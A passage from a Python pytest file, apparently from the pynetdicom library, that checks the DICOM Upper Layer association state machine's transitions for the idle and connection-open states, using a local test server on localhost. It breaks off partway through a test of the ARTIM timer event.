("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
class BadDUL:
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine:
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
fsm = assoc.dul.state_machine
assert fsm.current_state == "Sta1"
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition("Sta0")
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = msg = r"Invalid event '{}' for the current state '{}'".format(
event, state
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase:
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ""
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.scp = None
def teardown(self):
if self.scp:
for commands in self.scp.commands:
self.scp.step()
# self.scp.commands = [('exit', None)]
# self.scp.step()
self.scp.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == "request":
primitive.application_context_name = "1.2.3.4.5.6"
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = "LOCAL_AE_TITLE "
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = "REMOTE_AE_TITLE "
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ("localhost", 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ("localhost", 11112)
# Proposed presentation contexts
cx = build_context(Verification)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = "1.2.3.4"
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == "accept":
primitive.application_context_name = "1.2.3.4.5.6"
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = "LOCAL_AE_TITLE "
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = "REMOTE_AE_TITLE "
# The TCP/IP address of the source, pynetdicom includes port too
primitive.result = 0x00
primitive.result_source = 0x01
# Proposed presentation contexts
cx = build_context(Verification)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = "1.2.3.4.5"
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == "reject":
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = "affirmative"
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(("localhost", 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print("Transitions", fsm._transitions)
print("Changes")
for change in fsm._changes:
print("\t{}".format(change))
print("Events", fsm._events)
if scp and scp.handlers:
print("Received", scp.handlers[0].received)
print("Sent", scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, pack("ll", 1, 0))
sock.connect(("localhost", 11112))
ae = AE()
ae.add_supported_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="acceptor")
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ""
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
def wait_on_state(self, fsm, state, timeout=5):
start = 0
while fsm.current_state != state and start < timeout:
time.sleep(0.05)
start += 0.05
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, "Sta1")
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [("recv", None), ("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:1] == ["Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt3"]
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [("send", a_associate_rj), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt6"]
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate("accept"))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt7"
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate("reject"))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt8"
assert self.fsm.current_state == "Sta1"
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt9"
assert self.fsm.current_state == "Sta1"
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [("send", p_data_tf), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt10"]
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt11"
assert self.fsm.current_state == "Sta1"
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [("send", a_release_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt12"]
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [("send", a_release_rp), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt13"]
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt14"
assert self.fsm.current_state == "Sta1"
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt15"
assert self.fsm.current_state == "Sta1"
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt16"]
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt17"]
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == "Evt18"
assert self.fsm.current_state == "Sta1"
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [("send", b"\x08\x00\x00\x00\x00\x00\x00"), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, "Sta2")
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", a_associate_ac), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt3", "AA-1")]
assert fsm._events[:2] == ["Evt5", "Evt3"]
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", a_associate_rj), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt4", "AA-1")]
assert fsm._events[:2] == ["Evt5", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [("send", a_associate_rq), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt6", "AE-6")]
assert fsm._events[:2] == ["Evt5", "Evt6"]
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b"\x00\x02" + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [("send", bad_request), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt6", "AE-6")]
assert fsm._events[:2] == ["Evt5", "Evt6"]
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt7"]
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt8"]
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt9"]
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", p_data_tf), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt10", "AA-1")]
assert fsm._events[:2] == ["Evt5", "Evt10"]
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt11"]
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", a_release_rq), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt12", "AA-1")]
assert fsm._events[:2] == ["Evt5", "Evt12"]
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", a_release_rp), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt13", "AA-1")]
assert fsm._events[:2] == ["Evt5", "Evt13"]
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt14"]
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt15"]
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta1"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt16", "AA-2")]
assert fsm._events[:2] == ["Evt5", "Evt16"]
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:2] == ["Sta2", "Sta1"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt17", "AA-5")]
assert fsm._events[:2] == ["Evt5", "Evt17"]
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
